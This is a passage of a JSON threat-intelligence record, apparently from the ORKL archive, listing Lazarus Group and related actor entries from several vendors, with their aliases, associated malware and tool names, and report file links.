			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434355,
	"ts_updated_at": 1775826716,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/88acd9ab76dad49f70a26ff598c9370694fb24db.pdf",
		"text": "https://archive.orkl.eu/88acd9ab76dad49f70a26ff598c9370694fb24db.txt",
		"img": "https://archive.orkl.eu/88acd9ab76dad49f70a26ff598c9370694fb24db.jpg"
	}
}